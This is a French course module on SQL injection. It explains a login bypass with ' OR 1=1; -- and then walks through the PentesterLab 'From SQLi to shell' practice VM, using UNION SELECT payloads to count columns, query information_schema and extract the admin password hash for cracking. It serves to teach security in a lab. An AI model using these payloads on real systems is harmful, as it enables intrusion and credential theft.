+++
chapter = true
pre = "<b>7. </b>"
title = "Injection SQL"
weight = 70
+++

### Module 7

# Injection SQL

Dans les sites web dont les données proviennent d'une BD, l'application doit faire des requêtes SQL à cette BD pour afficher les informations dans les pages.

Lorsque vous entrez votre identifiant et votre mot de passe dans un formulaire de connexion, il faut que ces informations soient validées en se basant sur le contenu de la BD. Donc si vous entrez *saturnin* comme identifiant et *abc-123* comme mot de passe, il faut vérifier si dans la BD il existe un utilisateur nommé `saturnin` et si son mot de passe est `abc-123`.

Ceci pourrait par exemple correspondre à une requête comme celle-ci:
```
SELECT * FROM utilisateurs WHERE login='saturnin' AND mdp='abc-123';
```
Si la requête retourne une rangée alors le programme peut laisser entre l'utilisateur.

> Une injection SQL consiste à manipuler directement la requête en entrant des caractères qui ont un sens particulier dans le langage SQL.

Par exemple, si dans le formulaire, au lieu d'entre l'identifiant de connexion on entre la valeur `' OR 1=1; --`, la requête qui sera construite sera celle-ci:
```
SELECT * FROM utilisateurs WHERE login='' OR 1=1; -- saturnin' AND mdp='abc-123';
```
Dans cette requête, tout ce qui suit `--` sera ignoré car les deux tirets servent à marquer les commentaires en SQL. Dans la clause WHERE qui précède, l'expression `login='' OR 1=1` est évaluée comme "vraie" par SQL car dans une conjonction avec OR, il suffit qu'un des termes soit vrai pour que toute l'expression soit vraie (et 1=1 est toujours vrai). En SQL, lorsque ce qui suit le WHERE est vrai, la rangée sera retournée; et cette expression `login='' OR 1=1` est vraie pour toutes les rangées. En conséquence, le fait d'écrire `' OR 1=1; --` dans le champ d'un formulaire aura pour effet de retourner toutes les rangées de la table.

Il est possible d'injecter du SQL dans les formulaires, mais aussi dans les url qui mênent à une page.

## Démonstration 1

Ici nous allons utiliser une VM vulnérable aux injections SQL basée sur le fichier `from_sqli_to_shell_i386.iso` (disponible sur le disque *N:* et [ici](https://pentesterlab.com/exercises/from_sqli_to_shell/iso)).

(source: site *PentesterLab*, https://pentesterlab.com/exercises/from_sqli_to_shell/course)

### Page *show.php*

Dans la section *test*, vous verrez que chaque page retournée correspond à l'url *cat.php* qui prend un paramètre `id`:
```
/cat.php?id=1
```

#### Tester l'injection
Pour tester si une injection est possible, on peut essayer de vérifier si des opérateurs dans ce lien peuvent être interprétés comme tels par SQL. La technique simple consiste à faire une soustraction: si `/cat.php?id=6-5` ou `/cat.php?id=3-2` donnent le même résultat que `/cat.php?id=1`, une injection est possible.

#### Exploiter l'injection

La clause UNION est utile dans une injection SQL car elle permet d'ajouter à la requête de la page différentes informations que l'attaquant souhaite exécuter.

UNION sert à combiner les résultats de deux requêtes différentes si celles-ci ont le même nombre de colonnes dans leurs résultats. 

SELECT permet d'afficher telles quelles des valeurs littérales: par exemple, SELECT 1,2 affichera une table avec deux colonnes ayant pour valeurs 1 et 2.

En utilisant conjointement UNION et SELECT, on peut donc deviner le nombre de colonnes retournées par la requête d'origine:
```sql
cat.php?id=1 UNION SELECT 1        -- Affiche une erreur
cat.php?id=1 UNION SELECT 1,2      -- Affiche une erreur
cat.php?id=1 UNION SELECT 1,2,3    -- Affiche une erreur
cat.php?id=1 UNION SELECT 1,2,3,4  -- Retourne des résultats
```
Les trois premiers résultats donnent une erreur: UNION est impossible car la requête utilisée dans l'application retourne 4 colonne et le SELECT retourne un un nombre de colonne différent. UNION ne cause plus d'erreur avec SELECT 1,2,3,4, donc la requête originale retourne 4 colonnes.

Aussi, le fait qu'on voit apparaître "2" dans la page signifie que le nom de la photo correspond à la 2e colonne des résultats:
![sqlunion2](/420-313/images/sqlunion2.png)

#### Utiliser les fonctions SQL
Le langage SQL définit des fonctions qu'on peut utiliser dans des requêtes. Celles-ci peuvent être assez révélatrices sur l'état du serveur. On les appellera donc à la place du "2", et ainsi on pourra voir s'afficher sur la page ce que ces fonctions retournent.

**current_user()** affiche l'identifiant de l'utilisateur courant:
```sql
cat.php?id=1 UNION SELECT 1,current_user(),3,4
```
![sqlinjcuruser](/420-313/images/sqlinjcuruser.png)

**database()** affiche le nom de la BD courante:
```sql
cat.php?id=1 UNION SELECT 1,database(),3,4
```
![sqldbfunc](/420-313/images/sqldbfunc.png)

#### Utiliser la BD *information_schema*
Les bases de données MySQL stockent dans une base de données nommée **information_schema** et les tables qu'elle contient les informations sur les autres bases de données du serveur: les informations sur les tables sont dans un table nommée *Tables*; les informations sur les champs sont dans une table nommée *Columns*, etc.

On peut donc obtenir des informations sur la BD qu'on attaque en faisant des requêtes sur *information_schema*.

La requête suivante retourne un grand nombre de résultats:
```sql
cat.php?id=1 UNION SELECT 1,table_name,3,4 from information_schema.tables
```
Parmi tous ces résultats, le plupart sont des tables qui existent dans tous les systèmes MySQL; cependant vers la fin on retrouve des noms plus spécifiques:
![sqltables](/420-313/images/sqltables.png)

On peut donc présumer qu'elles contiennent des informations propres à l'application qu'on attaque. On peut pousser plus loin en cherchant les noms des colonnes de la table *users*:
```sql
cat.php?id=1 UNION SELECT 1,column_name,3,4 from information_schema.columns WHERE table_name like "users"
```
![sqlidlogin](/420-313/images/sqlidlogin.png)

On connaît maintenant le nom des champs. Utilisons cette information pour afficher les noms des utilisateurs:
```sql
cat.php?id=1 UNION SELECT 1,login,3,4 FROM users
```

Maintenant qu'on connaît le nom d'un utilisateur et le nom des champs de la table, trouvons le mot de passe de *admin*:
```sql
cat.php?id=1 UNION SELECT 1,password,3,4 from users WHERE login="admin"
```
Le résultat nous donne un hachage MD5 qu'on pourra essayer de briser par d'autres moyens (par exemple https://crackstation.net/).
![sqlmd5](/420-313/images/sqlmd5.png)
